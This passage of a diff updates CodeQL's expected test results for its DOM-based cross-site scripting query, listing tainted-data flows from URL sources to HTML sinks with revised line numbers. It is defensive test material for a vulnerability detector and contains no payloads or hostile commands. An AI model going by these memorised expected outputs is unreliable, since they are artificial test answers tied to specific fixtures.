.search | Cross-site scripting vulnerability due to $@. | tst.js:70:33:70:56 | documen ... .search | user-provided value | +| tst.js:71:32:71:55 | documen ... .search | tst.js:71:32:71:55 | documen ... .search | tst.js:71:32:71:55 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:71:32:71:55 | documen ... .search | user-provided value | +| tst.js:76:39:76:62 | documen ... .search | tst.js:76:39:76:62 | documen ... .search | tst.js:76:39:76:62 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:76:39:76:62 | documen ... .search | user-provided value | +| tst.js:82:30:82:53 | documen ... .search | tst.js:82:30:82:53 | documen ... .search | tst.js:82:30:82:53 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:82:30:82:53 | documen ... .search | user-provided value | +| tst.js:88:25:88:48 | documen ... .search | tst.js:88:25:88:48 | documen ... .search | tst.js:88:25:88:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:88:25:88:48 | documen ... .search | user-provided value | +| tst.js:95:18:95:18 | v | tst.js:93:11:93:34 | documen ... .search | tst.js:95:18:95:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:93:11:93:34 | documen ... .search | user-provided value | +| tst.js:120:18:120:18 | v | tst.js:93:11:93:34 | documen ... .search | tst.js:120:18:120:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:93:11:93:34 | documen ... .search | user-provided value | +| tst.js:135:49:135:49 | v | tst.js:132:29:132:50 | window. ... .search | tst.js:135:49:135:49 | v | Cross-site scripting vulnerability due to $@. | tst.js:132:29:132:50 | window. ... .search | user-provided value | +| tst.js:139:29:139:46 | xssSourceService() | tst.js:142:40:142:61 | window. ... .search | tst.js:139:29:139:46 | xssSourceService() | Cross-site scripting vulnerability due to $@. | tst.js:142:40:142:61 | window. ... 
.search | user-provided value | +| tst.js:164:28:164:33 | target | tst.js:161:18:161:41 | documen ... .search | tst.js:164:28:164:33 | target | Cross-site scripting vulnerability due to $@. | tst.js:161:18:161:41 | documen ... .search | user-provided value | +| tst.js:170:31:170:37 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:170:31:170:37 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:172:42:172:48 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:172:42:172:48 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:173:33:173:39 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:173:33:173:39 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:175:54:175:60 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:175:54:175:60 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:176:45:176:51 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:176:45:176:51 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:177:49:177:55 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:177:49:177:55 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:183:67:183:73 | tainted | tst.js:181:19:181:42 | documen ... .search | tst.js:183:67:183:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:184:67:184:73 | tainted | tst.js:181:19:181:42 | documen ... 
.search | tst.js:184:67:184:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:196:28:196:46 | this.state.tainted1 | tst.js:181:19:181:42 | documen ... .search | tst.js:196:28:196:46 | this.state.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:197:28:197:46 | this.state.tainted2 | tst.js:181:19:181:42 | documen ... .search | tst.js:197:28:197:46 | this.state.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:198:28:198:46 | this.state.tainted3 | tst.js:181:19:181:42 | documen ... .search | tst.js:198:28:198:46 | this.state.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:202:32:202:49 | prevState.tainted4 | tst.js:181:19:181:42 | documen ... .search | tst.js:202:32:202:49 | prevState.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:209:28:209:46 | this.props.tainted1 | tst.js:181:19:181:42 | documen ... .search | tst.js:209:28:209:46 | this.props.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:210:28:210:46 | this.props.tainted2 | tst.js:181:19:181:42 | documen ... .search | tst.js:210:28:210:46 | this.props.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:211:28:211:46 | this.props.tainted3 | tst.js:181:19:181:42 | documen ... .search | tst.js:211:28:211:46 | this.props.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... 
.search | user-provided value | +| tst.js:215:32:215:49 | prevProps.tainted4 | tst.js:181:19:181:42 | documen ... .search | tst.js:215:32:215:49 | prevProps.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:235:60:235:82 | this.st ... Tainted | tst.js:181:19:181:42 | documen ... .search | tst.js:235:60:235:82 | this.st ... Tainted | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:243:7:243:17 | window.name | tst.js:243:7:243:17 | window.name | tst.js:243:7:243:17 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:243:7:243:17 | window.name | user-provided value | +| tst.js:244:7:244:10 | name | tst.js:244:7:244:10 | name | tst.js:244:7:244:10 | name | Cross-site scripting vulnerability due to $@. | tst.js:244:7:244:10 | name | user-provided value | +| tst.js:248:11:248:21 | window.name | tst.js:248:11:248:21 | window.name | tst.js:248:11:248:21 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:248:11:248:21 | window.name | user-provided value | +| tst.js:264:22:264:29 | location | tst.js:264:22:264:29 | location | tst.js:264:22:264:29 | location | Cross-site scripting vulnerability due to $@. | tst.js:264:22:264:29 | location | user-provided value | +| tst.js:272:59:272:65 | tainted | tst.js:269:19:269:29 | window.name | tst.js:272:59:272:65 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:269:19:269:29 | window.name | user-provided value | +| tst.js:287:20:287:20 | e | tst.js:285:9:285:16 | location | tst.js:287:20:287:20 | e | Cross-site scripting vulnerability due to $@. | tst.js:285:9:285:16 | location | user-provided value | +| tst.js:295:20:295:20 | e | tst.js:292:10:292:17 | location | tst.js:295:20:295:20 | e | Cross-site scripting vulnerability due to $@. 
| tst.js:292:10:292:17 | location | user-provided value | +| tst.js:300:35:300:42 | location | tst.js:300:35:300:42 | location | tst.js:300:35:300:42 | location | Cross-site scripting vulnerability due to $@. | tst.js:300:35:300:42 | location | user-provided value | +| tst.js:316:18:316:35 | params.get('name') | tst.js:311:18:311:34 | document.location | tst.js:316:18:316:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:311:18:311:34 | document.location | user-provided value | +| tst.js:327:5:327:30 | getUrl( ... ring(1) | tst.js:325:20:325:36 | document.location | tst.js:327:5:327:30 | getUrl( ... ring(1) | Cross-site scripting vulnerability due to $@. | tst.js:325:20:325:36 | document.location | user-provided value | +| tst.js:333:12:333:17 | target | tst.js:332:16:332:39 | documen ... .search | tst.js:333:12:333:17 | target | Cross-site scripting vulnerability due to $@. | tst.js:332:16:332:39 | documen ... .search | user-provided value | +| tst.js:340:16:340:21 | target | tst.js:339:19:339:42 | documen ... .search | tst.js:340:16:340:21 | target | Cross-site scripting vulnerability due to $@. | tst.js:339:19:339:42 | documen ... .search | user-provided value | +| tst.js:344:21:344:26 | target | tst.js:339:19:339:42 | documen ... .search | tst.js:344:21:344:26 | target | Cross-site scripting vulnerability due to $@. | tst.js:339:19:339:42 | documen ... .search | user-provided value | +| tst.js:347:18:347:23 | target | tst.js:339:19:339:42 | documen ... .search | tst.js:347:18:347:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:339:19:339:42 | documen ... .search | user-provided value | +| tst.js:357:18:357:23 | target | tst.js:355:16:355:39 | documen ... .search | tst.js:357:18:357:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:16:355:39 | documen ... .search | user-provided value | +| tst.js:367:18:367:23 | target | tst.js:364:16:364:39 | documen ... 
.search | tst.js:367:18:367:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:369:18:369:29 | target.taint | tst.js:364:16:364:39 | documen ... .search | tst.js:369:18:369:29 | target.taint | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:375:18:375:30 | target.taint3 | tst.js:374:19:374:42 | documen ... .search | tst.js:375:18:375:30 | target.taint3 | Cross-site scripting vulnerability due to $@. | tst.js:374:19:374:42 | documen ... .search | user-provided value | +| tst.js:380:18:380:30 | target.taint5 | tst.js:364:16:364:39 | documen ... .search | tst.js:380:18:380:30 | target.taint5 | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:389:18:389:30 | target.taint7 | tst.js:364:16:364:39 | documen ... .search | tst.js:389:18:389:30 | target.taint7 | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:392:18:392:30 | target.taint8 | tst.js:364:16:364:39 | documen ... .search | tst.js:392:18:392:30 | target.taint8 | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:400:18:400:24 | payload | tst.js:399:17:399:36 | window.location.hash | tst.js:400:18:400:24 | payload | Cross-site scripting vulnerability due to $@. | tst.js:399:17:399:36 | window.location.hash | user-provided value | +| tst.js:404:20:404:27 | match[1] | tst.js:402:15:402:34 | window.location.hash | tst.js:404:20:404:27 | match[1] | Cross-site scripting vulnerability due to $@. | tst.js:402:15:402:34 | window.location.hash | user-provided value | +| tst.js:407:18:407:51 | window. ... '#')[1] | tst.js:407:18:407:37 | window.location.hash | tst.js:407:18:407:51 | window. ... 
'#')[1] | Cross-site scripting vulnerability due to $@. | tst.js:407:18:407:37 | window.location.hash | user-provided value | +| tst.js:413:18:413:89 | target. ... data>') | tst.js:411:16:411:39 | documen ... .search | tst.js:413:18:413:89 | target. ... data>') | Cross-site scripting vulnerability due to $@. | tst.js:411:16:411:39 | documen ... .search | user-provided value | +| tst.js:423:28:423:33 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:423:28:423:33 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:424:33:424:38 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:424:33:424:38 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:425:34:425:39 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:425:34:425:39 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:426:41:426:46 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:426:41:426:46 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:427:44:427:49 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:427:44:427:49 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:428:32:428:37 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:428:32:428:37 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:438:18:438:23 | source | tst.js:436:16:436:39 | documen ... .search | tst.js:438:18:438:23 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:16:436:39 | documen ... 
.search | user-provided value | +| tst.js:439:18:439:42 | ansiToH ... source) | tst.js:436:16:436:39 | documen ... .search | tst.js:439:18:439:42 | ansiToH ... source) | Cross-site scripting vulnerability due to $@. | tst.js:436:16:436:39 | documen ... .search | user-provided value | +| tst.js:446:21:446:26 | source | tst.js:443:15:443:38 | documen ... .search | tst.js:446:21:446:26 | source | Cross-site scripting vulnerability due to $@. | tst.js:443:15:443:38 | documen ... .search | user-provided value | +| tst.js:448:19:448:24 | source | tst.js:443:15:443:38 | documen ... .search | tst.js:448:19:448:24 | source | Cross-site scripting vulnerability due to $@. | tst.js:443:15:443:38 | documen ... .search | user-provided value | +| tst.js:450:20:450:25 | source | tst.js:443:15:443:38 | documen ... .search | tst.js:450:20:450:25 | source | Cross-site scripting vulnerability due to $@. | tst.js:443:15:443:38 | documen ... .search | user-provided value | +| tst.js:456:19:456:21 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:456:19:456:21 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:457:26:457:28 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:457:26:457:28 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:458:25:458:27 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:458:25:458:27 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:459:20:459:22 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:459:20:459:22 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:469:22:469:24 | url | tst.js:454:13:454:36 | documen ... 
.search | tst.js:469:22:469:24 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:474:23:474:45 | locatio ... bstr(1) | tst.js:474:23:474:35 | location.hash | tst.js:474:23:474:45 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:474:23:474:35 | location.hash | user-provided value | +| tst.js:477:18:477:40 | locatio ... bstr(1) | tst.js:477:18:477:30 | location.hash | tst.js:477:18:477:40 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:477:18:477:30 | location.hash | user-provided value | +| tst.js:484:33:484:63 | decodeU ... n.hash) | tst.js:484:43:484:62 | window.location.hash | tst.js:484:33:484:63 | decodeU ... n.hash) | Cross-site scripting vulnerability due to $@. | tst.js:484:43:484:62 | window.location.hash | user-provided value | +| tst.js:492:18:492:54 | target. ... "), '') | tst.js:491:16:491:39 | documen ... .search | tst.js:492:18:492:54 | target. ... "), '') | Cross-site scripting vulnerability due to $@. | tst.js:491:16:491:39 | documen ... .search | user-provided value | | typeahead.js:25:18:25:20 | val | typeahead.js:20:22:20:45 | documen ... .search | typeahead.js:25:18:25:20 | val | Cross-site scripting vulnerability due to $@. | typeahead.js:20:22:20:45 | documen ... .search | user-provided value | | various-concat-obfuscations.js:4:4:4:31 | "
" ...
" | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:4:4:4:31 | "
" ...
" | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | | various-concat-obfuscations.js:5:4:5:26 | `
$ ...
` | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:5:4:5:26 | `
$ ...
` | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/XssWithAdditionalSources.expected b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/XssWithAdditionalSources.expected index 8e4fdb09b996..a9bc4f7c3a0b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/XssWithAdditionalSources.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/XssWithAdditionalSources.expected @@ -152,7 +152,7 @@ nodes | dragAndDrop.ts:73:29:73:39 | droppedHtml | semmle.label | droppedHtml | | event-handler-receiver.js:2:31:2:83 | '

' | semmle.label | '

' | | event-handler-receiver.js:2:49:2:61 | location.href | semmle.label | location.href | -| express.js:7:15:7:33 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:6:15:6:33 | req.param("wobble") | semmle.label | req.param("wobble") | | jquery.js:2:7:2:40 | tainted | semmle.label | tainted | | jquery.js:2:17:2:40 | documen ... .search | semmle.label | documen ... .search | | jquery.js:4:5:4:11 | tainted | semmle.label | tainted | @@ -202,8 +202,8 @@ nodes | jwt-server.js:7:17:7:35 | req.param("wobble") | semmle.label | req.param("wobble") | | jwt-server.js:9:16:9:20 | taint | semmle.label | taint | | jwt-server.js:9:55:9:61 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:25 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:29 | decoded.foo | semmle.label | decoded.foo | +| jwt-server.js:10:19:10:25 | decoded | semmle.label | decoded | +| jwt-server.js:10:19:10:29 | decoded.foo | semmle.label | decoded.foo | | jwt.js:4:36:4:39 | data | semmle.label | data | | jwt.js:5:9:5:34 | decoded | semmle.label | decoded | | jwt.js:5:19:5:34 | jwt_decode(data) | semmle.label | jwt_decode(data) | 
@@ -348,9 +348,9 @@ nodes | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | -| translate.js:9:27:9:38 | searchParams | semmle.label | searchParams | -| translate.js:9:27:9:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| translate.js:9:27:9:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | +| translate.js:8:27:8:38 | searchParams | semmle.label | searchParams | +| translate.js:8:27:8:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| translate.js:8:27:8:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | | trusted-types-lib.js:1:28:1:28 | x | semmle.label | x | | trusted-types-lib.js:2:12:2:12 | x | semmle.label | x | | trusted-types.js:3:62:3:62 | x | semmle.label | x | @@ -373,240 +373,240 @@ nodes | tst3.js:10:38:10:43 | data.p | semmle.label | data.p | | tst.js:2:7:2:39 | target | semmle.label | target | | tst.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:5:18:5:23 | target | semmle.label | target | -| tst.js:8:18:8:126 | "" | semmle.label | "" | -| tst.js:8:37:8:58 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:12:5:12:42 | '
' | semmle.label | '
' | -| tst.js:12:28:12:33 | target | semmle.label | target | -| tst.js:17:7:17:56 | params | semmle.label | params | -| tst.js:17:7:17:56 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | -| tst.js:17:16:17:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:17:25:17:41 | document.location | semmle.label | document.location | -| tst.js:18:18:18:23 | params | semmle.label | params | -| tst.js:18:18:18:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:18:18:18:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:20:7:20:61 | searchParams | semmle.label | searchParams | -| tst.js:20:7:20:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:20:22:20:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | -| tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... 
ing(1)) [MapValue] | -| tst.js:20:42:20:47 | target | semmle.label | target | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:21:18:21:29 | searchParams | semmle.label | searchParams | -| tst.js:21:18:21:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:21:18:21:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | -| tst.js:24:14:24:19 | target | semmle.label | target | -| tst.js:26:18:26:23 | target | semmle.label | target | -| tst.js:28:5:28:28 | documen ... .search | semmle.label | documen ... .search | -| tst.js:31:10:31:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:34:16:34:20 | bar() | semmle.label | bar() | -| tst.js:36:14:36:14 | x | semmle.label | x | -| tst.js:37:10:37:10 | x | semmle.label | x | -| tst.js:40:16:40:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | -| tst.js:40:20:40:43 | documen ... .search | semmle.label | documen ... .search | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:43:10:43:31 | "
" ...
" | semmle.label | "
" ...
" | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:46:16:46:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:4:18:4:23 | target | semmle.label | target | +| tst.js:6:18:6:126 | "" | semmle.label | "" | +| tst.js:6:37:6:58 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:9:5:9:42 | '
' | semmle.label | '
' | +| tst.js:9:28:9:33 | target | semmle.label | target | +| tst.js:14:7:14:56 | params | semmle.label | params | +| tst.js:14:7:14:56 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | +| tst.js:14:16:14:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:14:25:14:41 | document.location | semmle.label | document.location | +| tst.js:15:18:15:23 | params | semmle.label | params | +| tst.js:15:18:15:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:15:18:15:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:17:7:17:61 | searchParams | semmle.label | searchParams | +| tst.js:17:7:17:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:17:22:17:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | +| tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... 
ing(1)) [MapValue] | +| tst.js:17:42:17:47 | target | semmle.label | target | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:18:18:18:29 | searchParams | semmle.label | searchParams | +| tst.js:18:18:18:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:18:18:18:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | +| tst.js:21:14:21:19 | target | semmle.label | target | +| tst.js:22:18:22:23 | target | semmle.label | target | +| tst.js:24:5:24:28 | documen ... .search | semmle.label | documen ... .search | +| tst.js:27:10:27:33 | documen ... .search | semmle.label | documen ... .search | +| tst.js:29:16:29:20 | bar() | semmle.label | bar() | +| tst.js:31:14:31:14 | x | semmle.label | x | +| tst.js:32:10:32:10 | x | semmle.label | x | +| tst.js:34:16:34:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | +| tst.js:34:20:34:43 | documen ... .search | semmle.label | documen ... .search | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:37:10:37:31 | "
" ...
" | semmle.label | "
" ...
" | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:39:16:39:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:39:21:39:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:41:15:41:15 | s | semmle.label | s | +| tst.js:43:12:43:12 | s | semmle.label | s | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:46:16:46:45 | chop(do ... search) | semmle.label | chop(do ... search) | | tst.js:46:21:46:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:48:15:48:15 | s | semmle.label | s | -| tst.js:50:12:50:12 | s | semmle.label | s | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:54:16:54:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:56:16:56:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:58:16:58:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:26:58:30 | bar() | semmle.label | bar() | -| tst.js:60:34:60:34 | s | semmle.label | s | -| tst.js:62:18:62:18 | s | semmle.label | s | -| tst.js:64:25:64:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:65:25:65:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:68:16:68:20 | bar() | semmle.label | bar() | -| tst.js:70:1:70:27 | [,docum ... 
search] [1] | semmle.label | [,docum ... search] [1] | -| tst.js:70:3:70:26 | documen ... .search | semmle.label | documen ... .search | -| tst.js:70:46:70:46 | x | semmle.label | x | -| tst.js:73:20:73:20 | x | semmle.label | x | -| tst.js:77:49:77:72 | documen ... .search | semmle.label | documen ... .search | -| tst.js:81:26:81:49 | documen ... .search | semmle.label | documen ... .search | -| tst.js:82:25:82:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:84:33:84:56 | documen ... .search | semmle.label | documen ... .search | -| tst.js:85:32:85:55 | documen ... .search | semmle.label | documen ... .search | -| tst.js:90:39:90:62 | documen ... .search | semmle.label | documen ... .search | -| tst.js:96:30:96:53 | documen ... .search | semmle.label | documen ... .search | -| tst.js:102:25:102:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:7:107:44 | v | semmle.label | v | -| tst.js:107:11:107:34 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:11:107:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:110:18:110:18 | v | semmle.label | v | -| tst.js:136:18:136:18 | v | semmle.label | v | -| tst.js:148:29:148:50 | window. ... .search | semmle.label | window. ... .search | -| tst.js:151:29:151:29 | v | semmle.label | v | -| tst.js:151:49:151:49 | v | semmle.label | v | -| tst.js:155:29:155:46 | xssSourceService() | semmle.label | xssSourceService() | -| tst.js:158:40:158:61 | window. ... .search | semmle.label | window. ... .search | -| tst.js:177:9:177:41 | target | semmle.label | target | -| tst.js:177:18:177:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:180:28:180:33 | target | semmle.label | target | -| tst.js:184:9:184:42 | tainted | semmle.label | tainted | -| tst.js:184:19:184:42 | documen ... .search | semmle.label | documen ... 
